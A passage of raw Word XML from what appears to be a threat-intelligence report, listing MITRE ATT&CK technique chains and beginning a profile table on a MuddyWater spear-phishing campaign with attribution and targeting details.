          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Software Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F1DC4" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="00A86605" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A658D98"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T1087.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F5CC33"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7920C"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r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9AC82D"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T1518.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Software Discovery&gt;:Security Software Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE3CD1"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r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236FE8EE"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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1747C57C" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="00A86605" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376FE36A"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A742A47"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1113', 'T1560.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586DEA7"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1113 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Screen Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121885FC"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T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D8DBCE"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1219', 'T1102.002', 'T1132.001', 'T1071.001', 'T1104', 'T1105', 'T1090.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07753DB7"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1219 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Access Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD3AB8"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T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5752893F"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A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1132.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Encoding&gt;:Standard Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14681F04"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A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A89DB"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1104 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Multi-Stage Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D07999B"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1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579CC3AC"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1090.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:External Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B7AC5" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="009E1AF2"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1041']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3771B6E0" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="009E1AF2" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1041 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E258B98" w14:textId="20818B04" w:rsidR="00292FA1" w:rsidRPr="005935F8" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
      <w:r w:rsidR="00292FA1" w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E7046" w14:textId="524880DE" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="00292FA1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc153480891"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidR="008F6ABC" w:rsidRPr="008F6ABC">
        <w:t>Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="6CD5E925" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="00292FA1">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292FA1" w:rsidRPr="002D1D50" w14:paraId="328ACEB2" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="655E27BA" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6826EB00" w14:textId="71F5C1E5" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="001F5FE0" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38125670" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="00387DCC" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5FE0" w:rsidRPr="00B857D7" w14:paraId="1ACC9DE1" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35CB04E5" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4887852E" w14:textId="4538FC85" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>MuddyWater</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="120D1433" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRPr="00387DCC" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="16E3B418" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12284B7F" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="007328DE" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE50FE5" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="007328DE" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">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249F85FB" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="00387DCC" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="26653D72" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3880C241" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EA900AB" w14:textId="217F534B" w:rsidR="00292FA1" w:rsidRPr="007328DE" w:rsidRDefault="00522B1C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Iran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748B7DC7" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="00387DCC" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="7AEC2A2D" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14F30586" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A27A79E" w14:textId="05D40CEC" w:rsidR="00292FA1" w:rsidRDefault="004C449A" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Turkey, Pakistan, Tajikistan [2]</w:t>
            </w:r>
            <w:r w:rsidR="00421D9F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Middle East [1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E562C3E" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="00387DCC" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="476D6542" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="511AF0AA" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118F8E64" w14:textId="55271F5C" w:rsidR="00292FA1" w:rsidRDefault="009D76B8" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] Government, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5643A1" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="00387DCC" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="03EC486F" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD272C9" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
